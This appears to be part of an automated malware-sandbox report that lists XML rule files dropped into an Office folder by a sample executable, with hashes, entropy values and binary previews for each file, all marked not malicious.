                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1737
                                                                                                                                      Entropy (8bit):7.89205530220645
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:Lnc/SbnnTVdyUKRg4EJDqxZVSUX/2QpiaGCzxs1ZD:Lnc/SlsTR0EZoUv9piRtR
                                                                                                                                      MD5:DBDBBE0F25000A882F7A71F7121999A2
                                                                                                                                      SHA1:07FDF06D2B846FD7BB736D1380769F294C4DC84C
                                                                                                                                      SHA-256:1C6C61C014740F5DA2BEDCEEFCCCF044D789E6D2DA87D72819A0461EB63B4C5D
                                                                                                                                      SHA-512:1EAB97EC866EE4BA2E1BECDBF3074CE81DE66ACDF4B847A2E16693AF7CCA17BF8FE66C47B362AA696F785102CA5DC482E884C67B77DFD342FF6CB1573B048FD4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.>.W.....HJ~.81....._9.*q.SU.I...5.`...2..q.g....x...V.K.U.O.*'...7.&.HZ...KP.*..P2l@n.....TY....d..[st.$...}..i......T.|...$.C.....IUz.ri...8V..>..-;..x.~q.N. ....v..J..R.:..:D........@......5..q.m.y.3...NL... ..:z./..:L.J.n..i.y.gJ..e.....v...B..(...m9>.....+ra*r4...,.5D.......c.oL9.7...a..q|........|~'n..x.{.z..4J51.Q7....m...Mt.X}.|.C...<.....|%.y....`...0.7.#X^;..T7..q...y..E..............R.D.#..$h`..-..7..`.h.-.6.N.{..?.HI..o...u...(#..T..A.]. C.`.+A..j.....Kv.H."..).q.1.........E5..sml..Y.T...."K.Iq...cm.......(.....J^c8Sk2...-8c...5.....~|<.....U9...(.g..3'I.>p..6.)...$#d{.t...L...@u...ca....$..6[..c..:1'.}......R......k,.~y>...}Y..G2.{\I....s......a.Ff.s.<....#..t8....}]a.^....!0......B....."|.B...4..&...@..RC..2.d.&.....fD.B.....V...H..$..C./..\:.}^..i..4...8X.%..#E^.H..&.^.....D.s...HHj.K,F.. .w...'G..o~...3.|q.....|P..g....b4A..$..S.0..J..%[.wf.y.....*. .u....*..T...c...?.....>c..R.1G..$.*~*..........V...o.7.`7..t.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702750v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1699
                                                                                                                                      Entropy (8bit):7.879735861798601
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:o30DReD+vBDCDEDfkYAnANYV6JO5Z1sbWOc+3rggqClI9THJLFfuyAbD:gli3k8qV6J8gssrggqClIqD
                                                                                                                                      MD5:ADD87BE42D757F532BD83B9490DBA2F0
                                                                                                                                      SHA1:8AD49A93B90A025B02D5048945D77F5281E87869
                                                                                                                                      SHA-256:23BB3DF48D14367AD3FA0EDFAF20727FA4EDFBF27E6B9630DDAE6F482D297F93
                                                                                                                                      SHA-512:163BFC8877E40C67E88E7FCCBE86EC79A5758A5145F6F5EF49B01028E348E21D3C8855F44AF3B48E88F1CF26A0A816EC2C17DCF0D82C736260E48667BD8FF6BC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlUe..../..D....ff......}J...,S.=.....X.W.5...V..F..}t.r.C[.....S..".o....`u.K.....&.Lt.zjdw.=K KDGMZ.(.X........,..3V.(.e.X.G.<..n...u.u..)U..8..P...[S.RF..\.Q.`....K.gZ......ec._.z.%q. F.w..DFVE%.<1K..5.+iyNfr.(..-o....F....K#.....D.l.J.D.a.....G.x....@....P..H....tQ.yt!P..-c]....r..p6h..^A5U..._.t;e\..W.....$`..6z)U...7......._-.w.rqW.7b.}..O...x}.......,.a..D.a.." 9Nq...f../._.m..3...U.../g....J....ak.J h.=&.V.....:..,.e..'..mj.5.ff..O.i.......[.*0.k<Dy]..C.M..K.W..!....y...;.y!.F...0z@.O".+..t..e^..$..1..P.?...u..h....,.eq....Dcs....0...... l..........e...K5.\...u.r...e..g.R.G.g..A..,....1%.I.;.h../.m.:.....`....Y.%A.;q..X...Wv.L.0.sP...,..3.....-....+2..d.%......f..Ap......:Z.'?t..`Ug:.d..H..e<....j.X..o..4..WI.5d).....j[p...6.:.Z_$...6.\j...>SH...y.D2.=.V.HZ.Fv...0~.{.Y..........o..gct..2...0.X..B...{$..._._........q.L.A,...E*..ntU.g....dGg&..0...JPm..rt...m.?.1.kB....o.....Q.2.-...tE.}.yUW^$Ij.>... ..Gi.7^l?..<v.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702751v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1736
                                                                                                                                      Entropy (8bit):7.874329342828699
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:3tCm5jn1EGpvQbgqXMZzPtBUsD/yesfRdgNnuO1Z9byq+VUVhAqP2wv3AYPUbD:dl5j1I6/BUsD/Tsf3g5dFyq+VUVht8D
                                                                                                                                      MD5:565E02B91F9430EBFD1FACAA170C8F5B
                                                                                                                                      SHA1:8FA6677B22FBD2722A40C049AC618C44B090BAF7
                                                                                                                                      SHA-256:1C801184D13EB7FF9F328B6DEA169362AFE9F0E8EA0E59F54EFF63DC3A71BD80
                                                                                                                                      SHA-512:3B8D3893E86340F9878DADEB8FC3E1661836148177B9E776B434E82CEFEC95FCB2E0FE0301A0FEFE33AB5AA5F41708531FE26D86D31F4342E43F6CF67DE90439
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml"$.Q.b.=..~4..'.S.5v...1:.UQ7Z.q......n....M.#...$;...W..D..6.>....+l.I..).X.....%..Y..3*.w}..D.lZ!..~....?!..W..6....fGr....J..o..%./1...T.N.....O.Z.t8...Xe.$..n.a....6.Z.]..S......iF.=.o..._6.}.].yr.Q.=.x{.c/.....n.......-3.d..@.nY..q...tCx...........3...3i...(t....s....>%j..m.......ma...t.......d.R...1^.y.^#\..pq..g. =.4-;...-.)..8..c)g.O..I^..,lZ,.....1..b..W.Nz...v.).G.a.U...q.N.....B.F#\."3..q.....E.3.8.....=.V.....6...J...].B.u......~...Y.e..-..W.;.ZD^B.SH.e....3.mN...>.+.Pq..) .z.*k#..X..$O.>M7d.n..,..J.q/.J.p....`.....~.t}...r.X...}..Z\G..b.:...p.}...J~F@..+.../`?./..&.Z...w05.w<<.....Y.....%....U..7M.....$c-..}.9....`..6ND..F.V6px..h#...)..._Nph..@$s.7....%.p......W..`.A...Q.F.. ..s....[*...|4...`....a..W....J...Hl..,)........?.J.G.T..UC..&O...g...}.7....."..b.]~/.....h`.Sc.q..).C...h!.W..q.....^W..FSv?...j.'V.U.....46........t.......G...r...S...}....Nk.\...|...k.$dJ...k.$..XB6u...tW.{..S.'..]..C..8. 0.<E..".l....g1..W.7+....

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702800v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1687
                                                                                                                                      Entropy (8bit):7.869586385185663
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:FTVqSo1JP4fT0Ku03iaghO0BORaWLJs1dHzRT7dFn1mYbEbJ4aFKXKOwB+bD:aSqJP4b0KTSxhO7DJs19zV7LnJRmobnD
                                                                                                                                      MD5:62D549B4F38D98EF827CEBB79C50F388
                                                                                                                                      SHA1:2CD732B453D1FFAC1552D2B7C9BA09907B4241D1
                                                                                                                                      SHA-256:105E14B8E93EE3AA27D094A3E042F608FF9B6F5ACC92051992A463BE7A25D6A1
                                                                                                                                      SHA-512:4604CB7AF37E9C4FE90BA6FE211ACD87DA0F9AB67F6EDA99D131609DF405B2CC5BB86DE52AE7616632BD18BBE183BB3A62663F67788E38979AD555DF3892DD76
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.%.C.. .2r..*=$...t.j.V..:.....R.s.hz..t....&U...|9..........k.i..Tr.D...n.r..A7.7......R...0v.H.".c..... ...b.w...,...f_.,...I....?.I.{=...'G*...)..n..Gb...l.5C.D){...=...>Cu..^. Z-2(..B..<tj....w--JMh......R.....Y)./..t..7.P..n.!.x..?P..F.6..9+B..5.T.uJ..)..xf..~5.~:..._..Y .........j..I.<....RR..*.f.f...'...I..M7... .p}.i.oqJJ6...v.{...u..1.......?...jg..@..J.4e.....6d...:..r.d..36...n..!AjF.............p...1.5.1...}.f6;..p.5...R...Z..uT=.VC.p...|....6.9(U"..-O....U*.;.r..]..8.....C..r..s]...;}..e41%R..E...L....U:....\..:.F.v..BA..K.....6i....ee..Q....=...x.....{J0.g.1...f.P.&V..8D...f.....x.~N......t%(....v."..h ..K.y.......D......t..4b.-.4.$H.<+g.....|z...v._..7._0?..I...w....k...`.w..|W....C.B......].:..X........b......5.1.&U!.e.]>.U..o..F......./..E.A(Y.g.\..(....%....8 l%..;)&Ka...V{.C...(....*h.0.J.)=...:..N.E......N.".Ou..Y.vS...=.x.Ib.+Pd.YQ...l.\Ee.\.[..yU.*.MA.S..W.".XC.5".m..iA.B..0C.S...I..\...lv.su...7... P.,

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702801v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1724
                                                                                                                                      Entropy (8bit):7.881236373927956
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:Xn4QKsTOXJJ8TiL+1tjgcbZIQmdf+LUFnaD:HdTOZGTa+1t0tndfXFy
                                                                                                                                      MD5:B65CBB16296127C039A11A336FA9148B
                                                                                                                                      SHA1:CCE1F52574ADD1D78E009B7AD42EC05B04A5EF24
                                                                                                                                      SHA-256:EA32A50E93120C3F7336118DC1431FF7E4054081CC9FF17CE8A3C8F679D91782
                                                                                                                                      SHA-512:9687B990BA8E08866562394569F2207EACBFBB7789FE37EB382A65221CE0DD6C9391E0710D85D41FA09C927C02A103D2F989E3255FB41755E2B130E7F0A8806C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.r..c..*fkR.h1Q.=p]-'E.........!.....5..B.....R....(z.8c.i.."X..I.5.u+.P.^5.m...........2.*x..R.O...L./.O....:/.....\5.....8..]...}..hf..g..S...=.$1...|.ET..s......!.........s...|Ox..5.Q.~}.^.N......p..Vk...l....jl%..f..3>2n.v...>.....q...4RI.K$.M@.|..%zV......#..6l.s...$88r.=D.8.%%....i#..o..`...+)..hz.Kpj..\......qf]OE..pN..E...k..H..C)........;n......../...v...1.D.}S4/.H.O........;O..-.q.MYnS.Y..A.. zF.]..@].;.....F...R.`.........r..%......).O.g=2_F...Lj....%;.......b..1.&..........Z..a....6.L.v..<.@.Q.i.;<...cZ1".....0|.G...6n.qmZ.90..zV.lNcu+.O....".....BL...:>.......e...s..5Ih...gn.J..y....!..Z+.\.......W-..;..s$.%..W..f.............\..~.,..H..H5D.4L.s0...]..]...U...C.p...).i ef.c..@.Cwx.m.t...=F._8.|.dh\.{......@Q..,.G5.~.]..=..p....JC..%.+..CK.q.^."..'..fh^i.Y&.@....\.X..).NE.7..~MS.....P7....6.#..5.djp1p............].b.....*\...ku.$.h.....d;..cQ.x..A......cN.4.ex..W.X.I.*.T..YL.}...K....$G.O...TV._..-s..@I....%

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702850v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1701
                                                                                                                                      Entropy (8bit):7.870267169599101
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:D736uKCVltbabmxMtoEUGKayT4MtaAYDD:vVKYltbxxMtfU7a8tAP
                                                                                                                                      MD5:F983852C3B2DA13F356D46A11D7589C9
                                                                                                                                      SHA1:D43EC66F5DCC94869BC4A07BD60AB21159D44554
                                                                                                                                      SHA-256:10FE0937F88CBBCC691412C9BCE575B091EF24B7B16A8D8C86504E0684418EB3
                                                                                                                                      SHA-512:67029F2196F340B810418C53E67A2198DFD74ED34DABA067F22A99F3B7BBDABCD739CDDAE97586DCCA6AB1C46E1AA823AFFBD6CEC924C92342DE6CB31F318DFA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...W/.-*>X.=.8W]...../.Gz ....{...i....9.....F....9jU.....B.2.c..CVp..Q0....g.. .....l.BiPej.../*..........#...d<..X=.@.>..UC....[..Y$$. ..[.at=9?...._a|..%.WCq.s..vH.9.1x.~ug.Uv*..C..e..YS8hyr.............;..p#....[E......lB.w,C.NV......h...7.<=.k.. ..&.J....;h&.......Q.%.?...2(.5.....>...9.{....S...k_.]..-.{.|L.N...<.d.....WR<..E.Y.]).Y..f.f)H...0..7.|R9.$.t,.q..H.^.5.8.?)....n.yq.....f7.#...7).iQ..._D.....'...."H.v..n....d.!<a..D<$WS...+'.P.p./..$q......63.F..a...~.......W .;.......-QQ...uoT...DF!q....C=..7(.H...:&..k......<.uK.`....H..wr7...+.[2._S...s:rq.. .~*r.&Yb.y.o...78>....,....X.....UKx.(.E..7.S.W`..B.s".9!........W6.. .N........Dw&..4.8.d.+.........U,..4.h...W...F..d...Va.}......2;...z.!.Y...P......c$..S!^q=Dm.....V.... g...x.....Pa...n3..E.p...p.k........%>.......S@'.... /.c..Q.@.vF./M]n...].|oqJ....nnAo<-a.8j...0..a.^..v.3.`C..K.tL3..a..D..G+..1..sp..i...i[....\(f.[1..Rb........|.i.f..-.R.N......x....dN......#U4G..N.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702851v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1738
                                                                                                                                      Entropy (8bit):7.875020306874862
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:8P0ZqqUACfrREMylVImUYyfeKMCE5Tg0Vfh0aYfsO6uLD:cSqqbCfKnlVh0eKXXa2Pv6un
                                                                                                                                      MD5:199592D6BCAB6800CE653631931737C6
                                                                                                                                      SHA1:2AD9E1FE2D1FC8169351AEA301E3AA6265AFEABC
                                                                                                                                      SHA-256:451FEDDBE6FC10A1D02FC12DCEBB53BAE2CCE942D6FCCD1B8769433ABAAFD060
                                                                                                                                      SHA-512:99279970C09A190D55A11894B7C39DC3B26205C561D5E375B9239A5411950F8559030EB1AA94C37B1CA11097CF757933C7EF4405488363FA0E56E43ED05A5270
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.=A1...Eb....O..k..O..V....#...d.rk.+..)...g.z.Y>....`...B>>....hD...PqK...`.u..Q.k..q.AN..YWv..d.....d..-........7-...1G..y$..'`.g.K.M...,.7...^.....Y.0..?..E....V~Y).,1.6y.r..m.....O.-..b..#a.. ...vg.R.....#6c.F....U..mtz.W.>?.....0.......G!.5_....t......../..HxT....bp...@../.0,S.a.9Q'.....xXVk..I ..V..8Ei.....v|..a..XT..L%f.Y.....2.........Ud../.JE.xS.}&..A......O+...A.BV'sz...x.....`........qi_1.b.'}..'..(x..a?....5...\..7.n..p...@..!j...u...(.......c...... ....J......W..7.e.t.:..s.@_c.X.+*...-.........q..$...T....LF.1...:.Q..}...(....\.....v]..j.o......;:..>..6|.u&.ABp.....9..h\.o..y.D..%.<..\.?w..C5C...\?u.s5.?..~..G...?.Q=....;.).7..@.....3B.b.f.d.j.+.O.C.9.Y.k....2.[d..)4...v{...x]LJc........5\.}s...'.t..YK..Ak..[sG......W....JE2}.....k.].7v..y.E..W..,..U:.D..8..!<....C.....<z......2@1..$...<}."$..E.>t...q....Pw....R.:....d..Q.....Ni!.!n..!..z...cD..CC3+.aS^.`#.3.zu.....a....S....w..'..$..w.*E.=.zv.G..=Q../.%.....Y..P..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702900v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1707
                                                                                                                                      Entropy (8bit):7.879360033221576
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:g632jxX/vesUEyrEgIMvlzmXuFyJoMFggSBEyjs1H2uIdmhcPmuH3GATDhM6+n2a:/iXKvEeBn8oMFggFpHwYhctH2ChRgD
                                                                                                                                      MD5:7404422FFE4B5F8F222315E50E1FF33B
                                                                                                                                      SHA1:8ADE8F1E9F86D241DC56C143DB83E6E96AC0A677
                                                                                                                                      SHA-256:9738158B972C1A5B40BA62E58C48EAE7395D9911D6AAA089CEFE6B7AD0134C8A
                                                                                                                                      SHA-512:83672B485385F5F71485C2C294A139D051072B976D59BA968EE8AD45E5087BCE7BE23EE75F9AAB3FE2E0C0939C5573771D1721D434CCEA4F08BA962922A2E1D4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..."ET......D...=.8.E..e...LHx...Y.I...R2.U9..=.!...w.......dAfD..|W.C.i<E2.5a.P./......Q.......P...\.+..}jx3 ~.[W.\.;..=k".....F1.r..H..c.]n.\S).....0b.5...O.6.c..TG6y....968p0Y]...Et...z4.&.O..j.??s.i4)....q..@b....f.t.<g\...[..x....x.d.p.BRBmM[....tD....h?.(.kL...vJ.....:.....~....2..T...@.8.5.....v.....)..;..4....@..}eq.d..f...?..G.....ZK_Y#...\.P..l........i..A...)m7.u.Zi...f5.....n.E..,!No.....|"...$......P.*.}9.Y_.*.....t?.*....o.^.d.......7.n.-..g.>g....=!..8.. .....W......R.l..+....H%u.e A..t....$G.X...#.y.K..Jt.......i.H=]'......\.S...W...Gv.=8.....4..z.C.P.......!.^z..sH.F....8:.P....P...!.z..........q...m...k.{... .'{F....h.....9*...PK.K.[.)}...6.......f..O.].c)..n...aah...1#W~E+.....W.4\.y|B.Q..H.....L..i..e..5..@$..uO%..&....W.q`K....a...*t?3o^z...[..,"..jhc...$..#~.....N.|.af..OaS.2..0.p...o...v..HZ7..+. ..S....wi....K...x._.HV....Hf...%?....0..1........<.p0hCC...$s\R.J1.hE.AE.i...5.0.{.XF..{....TT..,.K..(.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702901v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1744
                                                                                                                                      Entropy (8bit):7.899479451792656
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:5Y7l9+OfPkrOu7Xxkrc6pKXdXnzzLaPYYhdmxa55NbsEvDiH3F0u1Ao3aRqABzMX:2D+iPkrOcUKdXnfLDmUxQYE+HV00XZ1D
                                                                                                                                      MD5:004817A46025B7EC6730AB34CA3FBB6E
                                                                                                                                      SHA1:2A8E0940B3A6EAAABC341AFAA3C9FB3917DA5994
                                                                                                                                      SHA-256:EFECF8EE2ACA378DC822E405B5A25321FA0BFB15E5DC16EF109ACA8BE651472D
                                                                                                                                      SHA-512:4C098FF05EAF0874E0033C53B3534C589DE84ED84E9BD8DB5C051B83BBA4F2444822B56BBB41591CDDE5EC0B06AB9135F2C9205C3B408DADD6F5731AD145E176
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml....V"..=p.X.|....%5:JhI(*..Z...S..Z.*..h<....wL.NA......CV:v..fb.E`U..L..a...G....0.SgE..\......ku.FjO._J...7...V.fSE ..9..._ ....A5O..h...?...r.."......Mp.,+cH."FB..k;.....0S.....4....36O...d|.._.#..5.=...........'<....W..b...+fD.b.....n.LmB...?.`F.mj..V..j[.._)).I@M.7{%+5.............a....G....9]35...TQ..4.%A...T.....8.r..7....B..\DN..V.,..0.s.i...4.2^..G,LP.....r....:.....sK.{oS.......v. ....v....T2... ?~S...39`p7.C..w...T.^.@r1wO..UO....x.:.`.$~o....{..5.S..'..l..W...k..PwN..Uc|U@........L].d.x..kb...Wm].\]w......J..%...1.,.z.i.h...mM...q.S{yS.W...U...2.2.Na.;..n..v(#..M..EF.."7.i.l..=.4....r}d..&C......A.,K,P(}..p......eM.4Q.Ag.4..U.w<.g..GcN.!.+2..............c..J......u...g<............eH....6p.m...T2.+:V1&-....u..7..>J..h;..../!.eV.V/.p...+ys..'.."...).%/N.V.b.U.O...?UK%0_.e..+.Q..;..x.U.-....A..V.a... L.n.Of..9h...Qq8...Qt.p..i..o..*.B............c+.}...>...z;-z.)|........'.......2../-..X....A..A.K....S....X.....zG.....T...

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702950v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1701
                                                                                                                                      Entropy (8bit):7.883840974774516
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:WqfzBXdW6tFfdphfD3Gh4hTRmAgt//DyDgCD:PzBXo6tFfdbfjvTRmAgRDA5
                                                                                                                                      MD5:8151FAB5280BC4EC374B399808F1BBD0
                                                                                                                                      SHA1:B432526CDB5C905A11D8B0290DA17CE345CC890A
                                                                                                                                      SHA-256:40DEEEE6DC1A44234180507A373D541839FE725E575F87EB8A769D6FBF8AC1B4
                                                                                                                                      SHA-512:05371DD13C8D2EB382682801122D4332D4EC542E826BD844ECE08309026011AB65469FB09746BBB25AA5861F63A9F7384CA146FEC7B7199F8D5BFD3C50262B0B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlJ?o.=..-....h?3X._.7.L.....k...l.+.$..U@...1aW.(.....TjA..b\T.$..;.VL.;!..AKj.=..AA<..u.......u...4l.,.).}.by..Yw......l.W.(\.Ue..L....iD.}e.....(.3...&lyb.{.p..-.vR7.8=OyNL5.a........T.o..2...:......7=Sx4.YJ..t......@..?L..H.}._i.=@.[$.)E....z...=.....$...%\....Ne N.6 .8....wI..r&...X.b.nuMy.N...5B. .=.:..!.[j|...OOJ.&..j.Hw.R.......&.s.e........|.."...{Kcp.....6.z.Y....*.(..>|..&...T.T....<R.".'.U..=.s...r...H.K..`4U.e.........".LR.i.VF...<.+..+c.....c..o..._.m.O.Vg.Ur..R.^>..I.r....IT..^....4.....).[a..X..&^....(.r.S.D..z.3.~I...../.Tm.Q.2...u\..Y-...J.6........0...c....Q.l.t^(il..w.{...!G....:.).9.0d....Z..=.O.e..&..jd.].Nrn.$y..@..........j.#.,...[5..6A6@]..W...n1..b....yc(...U..x....[...m.9.L!G.=.@.. ...}.A..:.4J...A....xW.e@....A.KI..;./R...v.#......#@.#q..]....c.PH.......WK..H1..C....X|D...\.q.&..............Q...f...Sp.....>..Xg..P..4..d%..`.`.K7|.~+ei~k.t2.ev@OS...(..%...vP.A..l.....X...g.+1Ft4....>..a..t........*...7n.6.L....#..q

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702951v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1738
                                                                                                                                      Entropy (8bit):7.87409496667309
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:3btE4GkorS75ee/LjnEBBS98xrka+7E7/laL47rqlogD:rq1SAe/LISJ47takfqx
                                                                                                                                      MD5:96E869FFAD762B67E1FDA558B93FB9B5
                                                                                                                                      SHA1:69B42339BCA2E272D29E27681216C53C7C8C948E
                                                                                                                                      SHA-256:F8364186439D8E31D83AFFA7D0DF58E9751AB40294CB29DED85DEC6B105ABBE1
                                                                                                                                      SHA-512:FF61FD1F024BC788CF3ADAF343F0A223190AA4B6360CDD99743912E8CBF2A9681059AB3E271004409DEEBD490BD3C62B2CD21F86A53D27055979B7A57AB9B3C5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..?.?h.MvJ.f.*.i...M.ao.>.i.B.!...{.../w...3g..dj..E..W..m.x`......B..U....U...U..P.FQ.".h.u..9...6.z.H......%x.."....H+/p@..b..@..e..%d}.j.*.u..P.a_............`.....L.#lF.YY(.e.....F..+n..^ce.j]...........(......<XQYX.l.3......|!..&M..........4.P.jL./c...[.h..=x...m.m`<.(z.Oo.u.XI#..c.s...9*3......3..:.Yp 8..wx'X.&....r%..p.*G..8...|A.E/nei.8>.0..f..}..;qb..$].5k*:..v.)(.@...z.~X.:.?. .Dit.w....".;S......]..y.?...d-.,.W;iE......(.o..p.D.q)y.e:.J8..W.sE.j...yXj.y.......Qf.Q..O.Y.g....tGZ....3...U.g.Ao)Ut....v......7......=G...8.#_Si...../..gq..T.'.7:....rM.3.i.p...9An.'A.....rl.(....&|b.i.U....M.!.....m..K..5H....~{iK..T....p.....kT.1..7....=u.....S......xC...J.._......U......PC-.1.t1...L....A..*......9.[.E.[EJJ.H}..#/.......C......rE.Z)r..$>2@.L<.>\.~..6`TU^t).;.h..i..Q..1.OKm.......l..E.x...V.5$.%.l.A.[.y..<<j.LO*.T.....z...$.....3<......lTV......4...q.9>..h*..3.};...+|0v.!O..!.k/.....*{Q>.A..e..U'n..?}WI..2......IVT....T..v...B.c...

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703000v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1702
                                                                                                                                      Entropy (8bit):7.876099228693826
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:Cgqyw53bM+W+lFuTlCnGJ0Ckzlhcccfvb/Lf++qzp3+pviN2OjB8513BQMgGJUbD:lAdFuQGJ0hhcccfzS+i2v4jydxgGJ+D
                                                                                                                                      MD5:EF96FB1E51A0AD9D18983EAB89AB03D9
                                                                                                                                      SHA1:3F6FF3B5BE0C0D26D2CD704C06B014E3136D8C8B
                                                                                                                                      SHA-256:177F538B58E79FD5EC20E91C873C234C05AEDA064006BCC957DE10FD561D5D57
                                                                                                                                      SHA-512:1C8F8AB93C2BF0F398BF96CC560A739022AF51A27E39A148C295A2814F2554E45FD7B2DF2E1490118ED157541B9F2E69E8F1F726BD5DD8D950D0E025F21A8BA9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...)..R.Y5.ZQ..\.z.l..hz.v....\.d:P........\=._r..MP.4xW.1...@X...!...c..]).....y..L.K...`\..}...VE/Pc......v......*.j.s.....*....vJ......M+..~...|#.@mi....Y.uC.].........8K..Q..../.f..(....8.r.[.I..j..`.|....Y..ZA..&....3.......#b.'..............?^..........S..$....<.'.J.3.KJ.ab...n.Tu....M....$#..Z.......H...........K-...PM.`].K...(o.G.c..E...\A.|..X"...U..Z..E/"u+........r.<.Ed......zA..;..PS...n7. .&..;......T.....-.)..i.....W......\..C\X)c.....~5F]...N....h:t..D...|.C).......:8`.6.r.Y.....,YnZ!?.,."LNM..[5..-..8......&i.f.O|}0....."j..9.R.&.....Bu>.g.cDLU.`...y.".3.$/..893..].;!.^.....d.R...4....R)(.6.2U.p....z...@..6.;l.tf....1....a.R-..i*...5N/.P..m.M. .2.2.B.....E...c...`.].....n.<5..4...9.*x..9.Q.1&]....I<.*..Tk...Y.;.......*b....$......|..f.0.....T.,#.5..5a.{..9...@.(.j.e...K)..n.8W..\\F.+..)..l.jOm..'.J....4.|`kb.:......C.?w.!.Bp.!C.n..l;j....u,.6....Uv..4....,.....wK.=....(5..K.._..kv~..V.3.(.C.....H..DU.R.R.7.lZ.DC..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703001v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1739
                                                                                                                                      Entropy (8bit):7.888292807743657
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:rOZ9uZecZDSSHDza/bjKqcSdHZ3Ar792jvG5b0X8MD:uugMhcPt/Srx2W0XJ
                                                                                                                                      MD5:1F0C3254E10CC83AF638652F8B3C45F1
                                                                                                                                      SHA1:55DBE3CC5EF9E6EC96523FA59D3054270BEA8534
                                                                                                                                      SHA-256:41DBD6C2F021217D4802C06A0EA111E6214771B4FE8FDF949A2CBC3E4CB9B67D
                                                                                                                                      SHA-512:33AC3122DFDFC60459CAD0666FE81F8FAF0896E035A34DC8E292F096384EAD9FFAC695F057113F4C95B29F91A31E1AC42267F55B7809D5C08D413CBA4358608E
                                                                                                                                      Malicious:false
